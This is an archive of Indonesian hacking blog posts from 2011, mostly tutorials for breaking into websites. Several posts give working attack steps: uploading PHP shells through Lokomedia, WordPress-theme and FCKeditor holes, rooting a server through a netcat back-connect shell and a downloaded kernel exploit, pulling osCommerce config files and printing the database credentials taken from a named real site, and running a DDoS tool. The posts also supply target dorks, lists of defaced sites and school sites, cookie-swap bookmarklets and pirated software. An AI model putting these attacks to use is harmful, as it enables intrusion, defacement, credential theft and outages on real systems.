urutan ke 4 dan ke 5 jadi hilang. urutan waktu tanem email :p

update lagi =)) Tab Security Question terbuka kembali

ternyata solusi d atas tidak dapat bertahan lama. huakhaaaaaaaaaaa :(( cecede deh fb. kembali lagi akun saya k hack. ternyata fb maintenance lagi. dari maintenance maintenance nambah parah. kerja sama kayanya sama hacker. bruakakakak. woke..

oh ya. yang coba coba hack fb saya . saya doain ilmu dari postingan saya ini ga manfaat .wkwkwkwk

postingan ini saya buat dengan keadaan saya seperti ini. lagi dan lagi ngejar chips saya. entah itu temen sendiri. atau cuma yg pengen niat. gpp deh. maju terus fb. kerja sama lah dngan hacker hacker. hahaha

moga berguna dan bermanfaat. jangan lupa komen deh :p

Back Up Driver dengan Double Driver

2011-05-23T17:41:00.000+07:00

waduh udah lama nih ga post.
kali ini saya mau nge bahas buat backup driver pake double driver

Double Driver (DD) dikembangkan oleh Budy Setiawan Kusumah yang dapat diakses di www.boozet.org. Ada beberapa software gratis yang telah dibuat, salah satunya adalah Double Driver ini. Software gratis ini berfungsi mem-backup semua driver yang ada di komputer, sehingga ketika kita install ulang windows, tinggal me-restore hasil backup-nya tanpa perlu repot-repot install satu persatu.

Software ini tampil dengan antarmuka yang sederhana, sehingga user pun seharusnya tidak kesulitan dalam menggunakannya. Berikut fitur-fitur double driver :

Melihat driver yang di install di komputer
Backup driver-driver yang terinstall
Restore driver
Menyimpan dan mencetak informasi detail driver yang ada

yang mau download disini

kalo cara pakai nya ya instal dulu aja. terus back up driver.
biasanya kalo sudah instal ulang. butuh instal driver lagi. tinggal d restore aja.

Web aldyfrz

2011-04-19T00:31:00.003+07:00

Silahkan Mampir gan ke web ane

http://aldyfrz.us <= portal web
http://wannabewebmaster.com <= masih maintenance
http://tasikcyber.net <= my forum

Patch Bug CMS Lokomedia

2011-04-15T18:14:00.001+07:00

Bagi anda yang pernah membeli buku dari lokomedia yang berjudul Jalan Pintas Menjadi Master PHP karangan Lukmanul Hakim. Buku tersebut memberikan bonus project website lengkap dengan tutorial dan dan source codenya. Tak dimungkiri saya pun sangat banyak belajar dari buku tersebut.

tetapi setelah saya pelajari dan di utak-atik, CMS tersebut memiliki Bugs yang sangat Fatal dan berbahaya, saya tidak perlu menggunakan tekhnik hacking yang rumit utk menjadi sang Administrator Web.

Kesalahan sang programmer berada di file /admin/content.php yang tidak menyertakan start session() untuk menyaring / membedakan antara user biasa dan administrator. sehingga dari URL browser saya lansung megetikkan url : "http://www.contohcms.com/admin/content.php?module=user" apa yang terjadi? Saya lalu di lempar ke halam yang berfungsi untuk menginputkan user baru (yang seharusnya user baru dikelola oleh admin web) Saya klik tombol Tambah User. Setelah menginputkan user baru dan menyimpan nya saya dilempar lagi ke halaman yang bertulisan "Untuk Mengakses Modul Anda Harus Login" Lalu saya login dengan mengetikkan username dan password yang baru saja saya inputkan tadi. Hasilnya.......!!!! Saya pun berhasil login (Meski Belum menjadi Administrator) berikutnya saya mengganti URL Pada browser menjadi "http://www.contohcms.com/admin/content.php?module=berita" Saya kemudian menginputkan sebuah berita dengan judul asal-asalan, kategori=terserah, isi berita= terserah, foto berita='kosong' simpan berita tersebut, kemudian lakukan edit berita yang beru saja saya inputkan. sekarang saya mau mengganti foto berita yang tadinya masih kosong, saya mau mengganti dengan Shell PHP (Bisa anda download di Kategori Download Pada Blog ini) Ternyata sang programmer tidak memproteksi jenis extension file yang akan di upload, Al hasil saya berhasil mengupload shell php ke server terletak di folder /admin/foto-berita/shell.php. saya mengeksekusi shell tersebut, dan........(Selanjutnya Terserah Anda:: Mau mendeface, memberitahukan ke admin website, atau mau melumpuhkan total website tersebut--Namun Bersikaplah selayaknya Hacker sesuai dengan Etika hacking ) tidak hanya menjadi administraotr di website tersebut saya pun menjadi Root di server tempat website tersebut di hosting.

PATCH
untuk memperbaiki bugs pada CMS Lokomedia bisa dengan memberikan Patch pada file /admin/content.php
dengan menambahkan penggalan kode berikut :

session_start();
if (empty($_SESSION[namauser]) AND empty($_SESSION[passuser])){
echo "Maaf anda tidak berhak menjalankan modul ini";
}
else{
.....Statement
}

Menambahkan penggalan kode yang sama di file /admin/aksi.php

session_start();

if (empty($_SESSION[namauser]) AND empty($_SESSION[passuser])){

echo "Maaf anda tidak berhak menjalankan modul ini";

}

else{

.....Statement

}

menyaring file yang akan di upload kode pada file aksi.php saat mengedit berita dengan penggalan kode berikut:

if ($tipe_file != "image/jpeg" AND $tipe_file != "image/pjpeg"){

echo "Gagal menyimpan data !!!

Tipe file $nama_file : $tipe_file

Tipe file yang diperbolehkan adalah : JPG/JPEG.
";

echo "Ulangi Lagi";

}

else{

.....statement

}

Sekian dari saya.. kalau ada yang kurang mohon di tambahkan..
Untuk menyaring target hacking yang menggunakan CMS Lokomedia, bisa menggunakan dork :
allinurl:/media.php?module=berita

Simbol untuk html

2011-04-15T09:31:00.003+07:00

Menuliskan symbol ternyata lumayan penting bagi para blog/web designer. Saat kita membuat suatu karya seperti template atau lainnya yang harus menuliskan symbol ASCII kedalam konten dengan maksud dan tujuan tertentu. Symbol ASCII seperti ; », ², ½, ±,®, ©, ™ dan lainnya sering kita jumpai di berbagai website. Bagaimana cara menuliskannya? Cara membuat symbol trademark, cara membuat simbol copyright, cara membuat registered dll adalah mudah, Berikut tabel perbendaharaan cara membuat symbol/kode ASCII baik cara pembuatannya langsung melalui kombinasi ALT Keyboard dan juga dalam bahasa HTMLnya.

Simbol Keterangan. Kode Kombinasi. Kode HTML

Bila masih susah dalam mengingat kombinasi-kombinasi cara membuat symbol-symbol ASCII yang dimaksud, tinggal trial and error saja. Oiya bagi yang membuat symbol ASCII ini melalui laptop mungkin perlu mengaktifkan tombol fn dalam menggunakan mode numlocknya. Semoga bermanfaat!

Remote upload. cms balitbang 3.42

2011-04-10T07:31:00.000+07:00

#[~] Author : the_cyber_nuxbie
#[~] Version: CMS Balitbang 3.42.
#[~] Link : http://www.kajianwebsite.org/download/CMS%203.42-17082010.rar
#[!] Dork : inurl:"/html/siswa.php?"
inurl:"/html/alumni.php?"
inurl:"/html/guru.php?"
______________________________________________________________

#[~] Exploited:
http://public_html/dir/editor/filemanager/connectors/uploadtest.html
http://public_html/dir/editor/filemanager/connectors/test.html
http://public_html/dir/editor/filemanager/browser/default/browser.html

#[~] Directory:
http://public_html/userfiles/file/file-deface.txt

Setting:
"editor/filemanager/connectors/php/config.php"

$Config['AllowedExtensions']['File'] = array('7z', 'aiff', 'asf', 'avi', 'bmp', 'csv', 'doc', 'fla', 'flv', 'gif', 'gz', 'gzip', 'jpeg', 'jpg', 'mid', 'mov', 'mp3', 'mp4', 'mpc', 'mpeg', 'mpg', 'ods', 'odt', 'pdf', 'png', 'ppt', 'pxd', 'qt', 'ram', 'rar', 'rm', 'rmi', 'rmvb', 'rtf', 'sdc', 'sitd', 'swf', 'sxc', 'sxw', 'tar', 'tgz', 'tif', 'tiff', 'txt', 'vsd', 'wav', 'wma', 'wmv', 'xls', 'xml', 'zip') ;
$Config['DeniedExtensions']['File'] = array() ;
$Config['FileTypesPath']['File'] = $Config['UserFilesPath'] . 'file/' ;
$Config['FileTypesAbsolutePath']['File']= ($Config['UserFilesAbsolutePath'] == '') ? '' : $Config['UserFilesAbsolutePath'].'file/' ;
$Config['QuickUploadPath']['File'] = $Config['UserFilesPath'] ;
$Config['QuickUploadAbsolutePath']['File']= $Config['UserFilesAbsolutePath'] ;

- P.o.C:
1. Target:
Special Site:.sch.id (indonesian).
http://www.smpn2muarapinang.sch.id
http://www.sman1gombong.sch.id
http://www.smpn13bdg.sch.id
http://www.pesantrenkrapyak.sch.id
http://www.smkkr2tomohon.sch.id

2. http://www.sman1gombong.sch.id/editor/filemanager/connectors/test.html
http://www.sman1gombong.sch.id/editor/filemanager/connectors/uploadtest.html

3. Find Your Files:
http://www.sman1gombong.sch.id/userfiles/file/h4ck3d.txt
http://www.sman1gombong.sch.id/userfiles/h4ck3d.txt

Rooting tutorial

2011-04-05T21:59:00.000+07:00

What we need?
-RFI Vulnerable Script
-PHP Shell
-Netcat
-Brains
First of all, we need to get a shell on a site.For this tutorial i will be using MulCi Shell.
So, once you have it on a site, go to the 'Backdoor Host' tab and forward a port.Now, go to the 'Back Connect' tab and insert the following settings:[URL="http://i44.tinypic.com/24l1xeb.png"]
1- Your IP Address.
2-The port you forwarded.
Now, go on CMD and type in:cd 'Path To Your Netcat.exe' and then you need to make netcat listen to the port you forwarded.To do this, type:nc -l -n -v -p port
It looked like this for me:Microsoft Windows XP [Version 5.1.2600]© Copyright 1985-2001 Microsoft Corp.
C:\FeAR>cd C:\
C:\WINDOWS>nc -l -n -v -p 4444listening on [any] 4444 ...Now, when you have netcat listening to the port you forwarded, click 'Connect'.When your connected, type 'whoami'.You shouldnt have root.Now, to find an exploit to root the box, you need to know whats the kernel version.To do this, just type 'uname -a'It should look something like this:Linux linux1.dmehosting.com 2.6.17-92.1.10.el5PAE #1 SMP Tue Aug 5 08:14:05 EDT 2008 i686Now, we go on exploit-db.com and we will look for '2.6.17'.
hhttp://www.exploit-db.com/exploits/5092/
Now, we type 'wget http://www.exploit-db.com/exploits/5092/ on the netcat window.
wget http://xpl_url.comSo the exploit works, you must compile it in the server(gcc) and execute it via exploit(-o).
To do this we type 'gcc 5092 -o exploit'.
Code:
gcc 5092 -o exploit
5092- After the url path.http://www.site.com/5092.
exploit- Output name.
Now you can execute your exploit by typing './exploit.
Wait for the exploit to finish running and type root again.
It should output in something like this:
[/COLOR] Code:
uid=0(root) gid=0(root) groups=500(apache)
his means you have successfully rooted the box .
There are more ways to do this, this is the way I usually do it.....And You Will Don IT.....
Soo Brother I Hope You Understand For This Tut.....
CMIIW

Be annonymus over the internet

2011-04-05T21:17:00.000+07:00

bismillahirohmanirrohim.
kali ini saya mau pake inggris aja tiap artikel. pengen di terima di GA. oke lets move out. wkwkkwk emang nya PB.

yaudah. walaupun copas dikit :D dari forum luar

Ok I`ll tell you guys how to hide your IP .It`s important to hide your IP ,wanna know why just search on the internet I`m sure you will find there why .Anyway here are few wasy you can do it .

( Oh and because I don`t want stupid questions like : why should I , how this works , how can this help me I wanna let you guys I`ll delete all posts with this type of questions)

1. ------------- What Is VPN ------------------

A virtual private network (VPN) is a computer network in which some of the links between nodes are carried by open connections or virtual circuits in some larger networks (such as the Internet), as opposed to running across a single private network. The Link Layer protocols of the virtual network are said to be tunneled through the transport network. One common application is to secure communications through the public Internet, but a VPN does not need to have explicit security features such as authentication or content encryption. For example, VPNs can also be used to separate the traffic of different user communities over an underlying network with strong security features, or to provide access to a network via customized or private routing mechanisms.
VPN service providers may offer best-effort performance, or may have a defined service level agreement (SLA) with their VPN customers. Generally, a VPN has a topology more complex than point-to-point.

2. ------------------------ Why to hide your IP -------------

Few reasons (My own ideea )

-Well as you can see internet is "ulimited" , anyone can do anything right now , we have so many spy tools ,so many IP info tools anything you need you can find . ( that`s a good point )
-Show your real ip and you will be a easy target for hackers.
-Block your IPS to know what you`re doing
Etc,etc, ( search over the internet , sorry but I`m too busy to write more and good points )

3. ---------------------Are this VPNs Secure ----------------

Well some of free VPNs can be backdoored or not , depends, usaully that VPS wich aren`t open source are .There is no exception for Pay VPNs services .
My advice , use only VPS wich come with open source ,try to read more about them , use wireshark ( if you know ) ,use a good anti-virus.

4.------------------- My list with free VPNs/Trial VPNs---

a) .............................. UtraVPN.fr --------------------------
Can be found at
UltraVPN

b) ------------------------AnonymityNetwork-----------------
Can be found at
http://www.anonymitynetwork.com

c)................................Relakks......... ..............................
Can be found at
https://www.relakks.com/

d)...............................FlashVPN......... ............................
Can be found at
FlashVNP.com

e)..............................CyberGhost........ ..........................
Can be found at
CyberGhost VPN

4.
Bye bye ..

Try to use if you can Proxy Before you connect to an VPN service , scan the vpn client , see if it`s an Open source , use wireshark too check your traffic.

CMIIW

Mozilla Firefox 4.0 versi CCPB (cara curang dan program bajakan)

2011-04-04T07:46:00.003+07:00

Mozilla Firefox 4.0 versi CCPB (cara curang dan program bajakan)

Bukan Firefox resmi, tapi Firefox modifikasi.
Sudah termasuk Add-on, plugin, tweak. Dijamin firefox anda jadi ngacirrrr...

Add-ons
* Adblock Plus 1.2.1 (Adblock Plus allow you to decide what you don't want to see on the web)
* Adblock Plus : Element Hiding Helper 1.0.6 (Helps you to create element hiding rules for Adblock Plus)
* Greasemonkey 0.9.1 (User script manager for Firefox) + Kaskus De-Obfuscator
* KasKusMenu 3.6.14
* Xmarks 3.9.5 (Online Bookmark Sync)
* Stylish 1.1 (Restyle the web with stylish)
* Flashgot 1.2.8 (Download Manager)
* Fasterfox 3.9.4 (Hard Performance and network tweaks for Firefox)
* Cookies Swap 0.5.253 (Tool to save and swap out a collection of cookies on the fly)

Plugin :
* Microsoft Office 2003
* Office 2007 Plugin 12.0.4518.1014
* Microsoft DRM
* Flash plugin
* WGA 1.7.0069.3
* OGA 1.7.0069.3
* Media Player Plugin 1.0.0.8
* QuickTime Player Plugin 7.6.0.0
* RealPlayer LiveConnect-Enabled Plugin 6.0.12.69
* RealPlayer Plugin 6.0.12.448
* Adobe Shockwave for Director Plugin 11.5
* Adobe Shockwave Flash Plugin 10.0.32.18
* Macromedia Authorware Plugin 2004.0.0.1
* Java SE 6 U24

* Sebelum install firefox ini, pastikan mozilla firefox yg lama di-uninstall sampai bersih!!
* Bila ada yang tidak beres pada halaman web, solusinya DISABLE ABP (Adblock Plus) atau Clear Cache
(Tools >> Clear Private Data >> Cache)
* Jangan lupa backup bookmark sebelum install firefox ini

download
http://www.indowebster.com/firefox_ccpb_.html

@kaskus@

Kumpulan 3000 java sript

2011-04-04T07:10:00.000+07:00

alhamdulilah saya post lagi mulai nge blog lagi. kemaren kemaren sempat vakum sebentar. oke to the point aja :

Berikut ada banyak sekali koleksi javascript, lebih dari 3000 kumpulan javascript yang mungkin suatu saat nanti anda butuhkan, dan kumpulan script ini bisa di download secara free, terdiri dari berbagai macam kategori, mulai dari text effect, sliding content, dan berbagai kategori lainnya. mungkin nanti dipasang di hasil deface an kalian. :D

Klik disni untuk download

@kaskus@

Cara Upload Shell/backdoor di WordPress.

2011-03-14T10:09:00.000+07:00

Cara upload shell di wordpress g juh beda dengan upload shell di joomla. Untuk cara upload shell di wordpress yang saya pake adalah dengan cara install theme wordpress. Jadi kalian membutuhkan pack theme wordpress,jadi searching dulu di google,banyak tuch. Setelah dapet themenya,mari kita masuk ke page admin target wordpress.

1. masuk ke apperaeance – klik add new,

2. kemudian akan muncul sebuah page untuk melakukan upload,sebelum kalian upload,kalian edit salah satu dari file yg ada di pack theme yg kalian miliki,misal file index.php kita edit,kita ubah script index.php menjadi script shell kita.kemudian kalian save dan pack lagi dengan zip.
3.upload dan install file pack themenya.tunggu
sekejap.kalo dah keluar pesan sukses maka berarti sukse,tinggal kita cari tempat shell kita berada di mana.
4.untuk tempat shell berada,karena theme wordpress biasanya berda pada public_html/wp-content/themes/nama direktori/nama file yang kita edit tadi.
Misal nama direktorinya mystique
Dan nama filenya index.php
So hasilnya kurang lebih sepeti ini “http://target.com/wp-content/theme/mystique/index.php”

Terus tekan enter , jreeeeeeeeeeeennnnngggggg shell kebuka di hadapan kita,dan kita bisa leluasa mau ngapain az di shell ke web target.
buat kalian yang bingung dan males baca tulisan ini bisa
juga liatvideonya disini
untuk yang males nyari2 theme bisa di ambil disini yang sudah saya edit.
Selamat menoba dan semoga tulisan ini bermanfaat dan berguna

sumber : http://dopunk.co.tv
source : xyberbreaker blog

Upload Shell / backdoor di OsCommerce

2011-03-09T15:07:00.003+07:00

langsung aja ea, jalan2 ke sana sini, nemu exploit ttg osCommerce ya udah lah, lsg jajal eh akhirnya bisa juga… hehehehh, gini nie explot yg ada di site itu,

# ByPass Page Admin :

You can use this Trick if admin folder not protected by .htaccess

if you Want to explore admin page without login. You can use /login.php behind the name of the file

Example :

http://[site]/admin/backup.php/login.php

or

http://[site]/admin/file_manager.php/login.php

Demo :

http://server/store/admin/file_manager.php/login.php

You can See all file in Directory Oscommerce.. haha ;)

and you can download all file with tRick above

# File Disclosure :

in : admin/file_manager.php/login.php?action=download&filename=

Exploit : admin/file_manager.php/login.php?action=download&filename=/includes/configure.php

Example : http://[site]/[path]/admin/file_manager.php/login.php?action=download&filename=/includes/configure.php

ok, sekarang kita cari targetnya dgn dork “Powered by osCommerce” tanpa tanda titik ya :D

utk percobaan kita pake trget ini : http://osc22ms2-cyberoffice.1fonet.fr/catalog
nah, kita cari dulu nie admin page nya , jadinya http://osc22ms2-cyberoffice.1fonet.fr/catalog/admin/login.php nah, ketemu deh… :)

sekarang, kita pake exploitnya jadinya : http://osc22ms2-cyberoffice.1fonet.fr/catalog/admin/file_manager.php/login.php?action=download&filename=/includes/configure.php nah kita mendapatkan configure.php, lsg aja deh kita download :D

selanjutnya, setelah kita download kita buka menggunakan notepad ato yg laen deh, nah itu tampak deh, kita coba dl masuk ke database tanpa masuk ke adminnya dgn yg kita dapatkan,

define(‘DB_SERVER_USERNAME’, ‘laurent’);
define(‘DB_SERVER_PASSWORD’, ‘UQzlZ0vrHEiu’);

habis kita dptkan yg kyk gitu, marilah kita buka melalui FTP, di sini saya menggunakan FileZila,
alhamdulillah sukses :genit: , marilah kita upload backdoor kita, biasanya sih di public_html, tp dsini saya upload di httpdocs, setelah success upload backdoor, lalu kita cek.
http://osc22ms2-cyberoffice.1fonet.fr/shell%20yg%20kita%20pasang, oke trnyata sudah terpasang, monggo silakan di lanjut pembantaiannya..

maaf ya klo agak ribet tulisannya, soalnya emg newbie jarang post

saya sertakan videonya supaya lbh mudah n lbh jelas

link download video

http://upload.ugm.ac.id/507video1.zip

mungkin ini dulu dari saya, kuran

DDoS via VADIM [ With Shell ]

2011-03-07T18:17:00.000+07:00

Kali ini kita akan membahas masalah DDoS via VADIM..

Apa itu DDoS ?

DDoD adalah suatu serangan kepada target yang bertujuan untuk melumpuhkan system target...

Beberapa hal yang dilakukan dalam serang DDoS :

- Mengkoneksikan systemkita dengan target.

- Mengirimkan paket data (request) dalam jumlah besar [ dapat menyebabkan system korban down ]

Banyak tehnik dalam melakukan serangan DDoS,,
Tapi kali ini kita akan membahas tentang DDoS via VADIM...

Disini kita tetap menggunakan shell sebagai controler DDoS..

Langkah pertama yang harus dilakukan adalah mendownload file Vadim

http://www.ziddu.com/download/10782940/vadim.tar.gz.html

Langkah kedua ialah mengupload file Vadim yang sudah kita download kedalam shell kita..
Catatan :

- Shell dalam kondisi safemode OFF

- Permission kita setting 777

Langkah selanjutnya ialah meng-ekstract file Vadim dengan menggunakan perintah :

tar -zxvf vadim.tar.gz

lalu klik GO

Setelah proses selesai akan terbentuk suatu directory yang bernama [Dos]
Lalu kita masuk kedalam directorynya dengan cara mengklik ganda directory tersebut..

hahahahaha

kita hampir selesai...

selanjutnya kita ketikkan perintah

./vadimI [IPtarget] [port] [jumlah paket data yang akan kita kirim]

Contoh :
./vadim 192.168.0.100 80 10000000000000000000000000000

lalu klik GO

Selesai !!

Kita tunggu dah hasilnya....

sumber : http://hacker-newbie.org

Login dengan cookis di rapidshare, hotfile, file serve dll

2011-03-04T09:48:00.002+07:00

buat http://hotfile.com

javascript:k3="http://hotfile.com/";if(location.href.indexOf(":\/\/hotfile.com")==-1){g=confirm("Click%20OK%20to%20direct-to%20Hotfile\nDeveloped BUGIS");if(g)location.href=k3;void(0);}else{c=prom pt("Insert%20your%20Hotfile%20cookie%20here%20frie nds","Cookie%20hotfile");if(c){r=confirm("Save%20t his%20cookie?");d=new%20Date();nd=new%20Date(d.get FullYear()+1,2,11);void(document.cookie="auth="+c+ ";domain=.hotfile.com;path=/;"+(r?"expires="+nd:""));location.href=k3}void( 0)}

_________________________________________________________________________________

Buat http://fileserve.com

javascript:hf="http://fileserve.com/";if(location.href.indexOf(":\/\/fileserve.com")==-1){g=confirm("Click%20OK%20to%20direct-to%20Fileserve\nDeveloped by BUGIS");if(g)location.href=hf;void(0);}else{c=prom pt("Insert%20your%20Fileserve%20cookie%20here%20fr iends","Cookie%20Fileserve");if(c){r=confirm("Reme meber%20this%20cookie?");d=new%20Date();nd=new%20D ate(d.getFullYear()+1,2,11);void(document.cookie=" cookie="+c+";domain=.fileserve.com;path=/;"+(r?"expires="+nd:""));location.href=hf}void( 0)}

__________________________________________________________________________________

buat http://megaupload.com/

javascript:hf="http://megaupload.com/";if(location.href.indexOf(":\/\/megaupload.com")==-1){g=confirm("Click%20OK%20to%20direct-to%20Megaupload\nDeveloped by BUGIS");if(g)location.href=hf;void(0);}else{c=prom pt("Insert%20your%20Megaupload%20cookie%20here%20f riends","Cookie%20Megaupload");if(c){r=confirm("Re memeber%20this%20cookie?");d=new%20Date();nd=new%2 0Date(d.getFullYear()+1,2,11);void(document.cookie ="user="+c+";domain=.megaupload.com;path=/;"+(r?"expires="+nd:""));location.href=hf}void( 0)}

__________________________________________________________________________________

buat http://rapidshare.com/

javascript:hf="http://rapidshare.com/";if(location.href.indexOf(":\/\/rapidshare.com")==-1){g=confirm("Click%20OK%20to%20direct-to%20Rapidshare\nDeveloped by BUGIS");if(g)location.href=hf;void(0);}else{c=prom pt("Insert%20your%20Rapidshare%20cookie%20here%20f riends ","Cookie%20rapidshare");if(c){r=confirm("Rememebe r%20this%20cookie?");d=new%20Date();nd=new%20Date( d.getFullYear()+1,2,11);void(document.cookie="enc= "+c+";domain=.rapidshare.com;path=/;"+(r?"expires="+nd:""));location.href=hf}void( 0)}

__________________________________________________________________________________

buat http://filesonic.com/

javascript:hf="http://filesonic.com/";if(location.href.indexOf(":\/\/www.filesonic.com")==-1){g=confirm("Click%20OK%20to%20direct-to%20Filesonic\nDeveloped by BUGIS");if(g)location.href=hf;void(0);}else{c=prom pt("Insert%20your%20Filesonic%20cookie%20here%20fr iends ","Cookie%20filesonic");if(c){r=confirm("Rememeber %20this%20cookie?");d=new%20Date();nd=new%20Date(d .getFullYear()+1,2,11);void(document.cookie="PHPSE SSID="+c+";domain=.filesonic.com;path=/;"+(r?"expires="+nd:""));location.href=hf}void( 0)}

___________________________________________________________________________________

Cara nya masuk homepage nya dulu. terus copas javascript di adress bar nya .

:D :D

Belajar Dasar Visual Basic (buat program)

2011-02-27T12:14:00.000+07:00

ketemu lagi sama saya . yg selallu imut walau suramz :D ahaha..

nih langsung aja ke TKP

http://xbasicpro.com/kursus_online/kursus_vb6_dasar.aspx

Show Off Valentine

2011-02-27T11:59:00.001+07:00

Lupa waktu tgl 14 ga di post disini

wkwkwkwkwkw

langsung aja dah cekitdot

http://suncoastpmi.org/fvcklentine.htm

http://www.dinet.co.il/fvcklentine.htm

http://cortesconstructionservices.com/fvcklentine.htm

http://freedirectories.com/fvcklentine.htm

http://tampatank.com/fvcklentine.htm

http://magnetweb.com/fvcklentine.htm

http://pinnacledh.com/fvcklentine.htm

http://lex-tek.com/fvcklentine.htm

http://ktcis.com/fvcklentine.htm

http://preciouspaper.com/fvcklentine.htm

http://reynoldsrecovery.com/fvcklentine.htm

http://webterra.com/fvcklentine.htm

http://nsiprecision.com/fvcklentine.htm

http://www.ridegreenlink.com/fvcklentine.htm

http://2hourstogreenville.com/fvcklentine.htm

http://bikeville.org/fvcklentine.htm

http://www.fallforgreenville.net/fvcklentine.htm

http://www.fallspark.com/fvcklentine.htm

http://greenvillesc.gov/fvcklentine.htm

http://www.greenvillesc.gov/fvcklentine.htm

http://hroasadmin.greenvillesc.gov/fvcklentine.htm

http://jobs.greenvillesc.gov/fvcklentine.htm

http://police.greenvillesc.gov/fvcklentine.htm

http://sistercities.greenvillesc.gov/fvcklentine.htm

http://testing.greenvillecvb.com/fvcklentine.htm

FVCKLENTINE

google.com

2011-02-27T11:47:00.002+07:00

altrnativ google

http://aldyfrz.owners.was.here.svc-1.google.com

hahaa :D

Trik Speed ngacir buat yang pake paket Flash Unlimited 50k atau 100k (Hack Bandwidth Flash)

2011-02-26T23:37:00.001+07:00

Trik ini emang tidak Full gretong,,
kita harus ngeluarin kocek sedikit nya 50k (untuk 14hr)
atau 100k (untuk 30hr)
tp jgn khawatir,,,kita bisa siasatin kuota yg di bundle sama paket si kampret yg katanya cuma 500 mb bisa nyampe ber giga2... hehehehe.... TESTED sebulan full gan!!

lumayan lah gan buat sedot data bisa ngacir sampe 250 kbps - 300kbps

tahap pertama :
# yang belum reg silahkan reg ke *363# pilih paket yg sesuai... mau 50k atau 100k

# setelah selesai,,set apn di modem agan dengan internet

# save dan set as default,,tutup aplikasi modem..

tahap kedua :

# siapin tool buat loncatin kodok nya (mdma dan dan reconnect dial) >> trik yg masih ampuh sampe saat ini buat sedot bandwith si kampredd...!!

# pada mdma set gprs/edge only terlebih dahulu..

# dial si kampret dr reconnect dial..ini di gunakan untuk jaga2 disco ya gan...

# setelah konek cek ip client nya,,kalo ane seh demen sama kepala 182 pada paket ini

# selanjut nya buka broser agan,, lalu masuk link speedtest,,, misalnya http://speedtest.indosatm2.com/ atau link2 lain yg menyediakan speedtest bandwith kita....

# silahkan mulai speedtest dengan klik start pada link td

# untuk mendapatkan bandwith yg kenceng,,,koneksi agan sampe disini harus tetep gprs/edge only..

# begitu hasil angka PING keluar pada speedtest td,,,skrng agan pindah kan koneksi nya pada 3G only pada aplikasi mdma nya...

tools :
http://www.mediafire.com/?nvcscx7m64ooifp
http://www.mediafire.com/?ryo80rzc41508o3
credit : rifqi36 @n3

Remote computer jarak jauh

2011-02-25T14:25:00.000+07:00

nih saya bagi pengalaman. waktu saya minta di ajarin nanya nanya tentang deface kalo ga salah sama kk xdieka-civilx nah di suruh download program tuh. apa coba saya ga ngerti. eh pas di download terus instal d buka ternyata buat access remote komputer jarak jauh
nih langsung aja ya nama programnya teamviewer.
kalo mau download disini aja
http://download.cnet.com/TeamViewer/3000-7240_4-10398150.html?part=dl-6271747&subj=dl&tag=button

download dulu. terus instal programnya. udah gitu
kamu bakal dapet id sama pass nya. kalo mau kontrol komputer org juga harus dah ke instal teamviewer nya. masukan id komputer orang lain sama pass nya.

sip langsung muncul deh. bisa kontrol.

dah ah. lagi lanjutin deface :D

WP-Cumulus for WordPress - XSS (deface)

2011-02-25T14:19:00.000+07:00

I want to warn you about security vulnerabilities in plugin WP-Cumulus for
WordPress.

These are Full path disclosure and Cross-Site Scripting vulnerabilities.

Full path disclosure:

http://site/wp-content/plugins/wp-cumulus/wp-cumulus.php

XSS:

http://site/wp-content/plugins/wp-cumulus/tagcloud.swf?mode=tags&tagclou
d=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-si
ze:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E

Code will execute after click. It's strictly social XSS.

Vulnerable are WP-Cumulus 1.20 and previous versions.

I mentioned about these vulnerabilities at my site
(http://websecurity.com.ua/3665/).

P.S.

This is one of that 20 plugins for WordPress where I found 135 different
vulnerabilities (during 2006-2009), which I wrote about in my summary of
vulnerabilities in plugins for WordPress
(http://websecurity.com.ua/3397/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua

ngerti ga ? wkwkwkwk. translate aja.
http://translate.google.co.id

Cara mengetahui web yang satu hostingan

2011-02-23T21:44:00.000+07:00

nih saya tau dari teman saya dieka. thanks to dieka. ini web buat mengetahui web yg satu hostingan

yaudah langsung aja
klik disini
cara nya copas web nya. tanpa http://
contohnya
www.target.com

sepp.
dah ah. hehe

Status Di Fb jadi warna biru

2011-02-14T22:22:00.001+07:00

Untuk update tulisan di facebook dengan tulisan warna biru silahkan gunakan update via blackberry kemudian dikotak update status ketik = @[0:0:kata2 status]
kemudian klik bagikan atau share atau terbitkan

untuk yang pake PC KLIK DISINI

kecuali yg pake bB bisa langsung copas @[0:0:kata2 status]

Download SwishMax 4 build 2010.11.02 Full Patch

2011-02-07T18:39:00.001+07:00

SwishMax merupakan software untuk membuat animasi flash dengan tampilan yang simple. Kalau sobat blogger ingin belajar membuat flash, tapi ingin yang mudah, mungkin bisa menggunakan SwishMax 4 build 2010.11.02 ini. Nggak jauh beda sama adobe flash sih,, hehe

With SWiSH Max4 you can create Flash movies quickly and easily. SWiSH Max4 is packed with features that lets you make stunning interactive Flash animations. Here are some of the features that make SWiSH Max4 so powerful:

Multimedia Effects & Components

Advanced Flash design for the graphic artist or animation programmer. Full design control.

Project Templates and Wizard Panel for quick publish of included projects.

Bundled with over 380 built-in multimedia effects and a simple effects browser.

Built-in effects make creating animations quick and easy using your videos, text, images, graphics or sounds.

Effects can be applied to multiple objects.

Supports multiple overlapping soundtracks with multiple sound effects.

Choose from over 300 components and vector shapes, or add your own custom built components.

Create and distribute your own special effects and components.

Component Tool for fast and easy placement of common components.

SWiSH Max4 - The Ultimate Flash Creation Tool

Advanced Flash Creation Tool For The Graphic Artist Or Web Professional

Creates Stunning Flash Animations and Websites with Ease

Includes over 380 Preset Multimedia Effects

Includes over 300 Ready-to-use Components and Vector Shapes

Import Images, Graphics, Sound and Video from all popular formats

Export Presentations to Flash, Video, EXE, GIF Animation or Image Sequence

Powerful Scripting Language for Advanced Users

Tools to Control Motion and Shape, Draw Shapes, Edit Text and more

Project templates - Instant Results Using the Wizard Panel

NEW! Morphing - Transform your shapes

NEW! Filter and Blend Effects - Blur and glow while you blend shapes and more

NEW! Improved Workflow - Advanced Find/Replace, New Script features, Paste options

INFO : Patch di anggap trojan, kalau takut, saran saya jangan di instal. Tapi buat yang pengen banget instal SwishMax 4 ini, silahakan saja. Sudah saya coba dan hasilnya berjalan dengan baik dan tidak ada masalah.

Sumber : remo-xp.com

Password : www.remo-xp.com

Download SwishMax 4 build 2010.11.02 Full Patch

Cheat Games Facebook

2011-02-07T18:02:00.001+07:00

Cheat Games Facebook Collection + [Tools]

Kumpulan Cheat games Facebook , Beragam macam Tools, Cheat, dan Tips ada disini.

Tools terdiri dari :
- FB Game Tool
- Cheat Games FB All in One
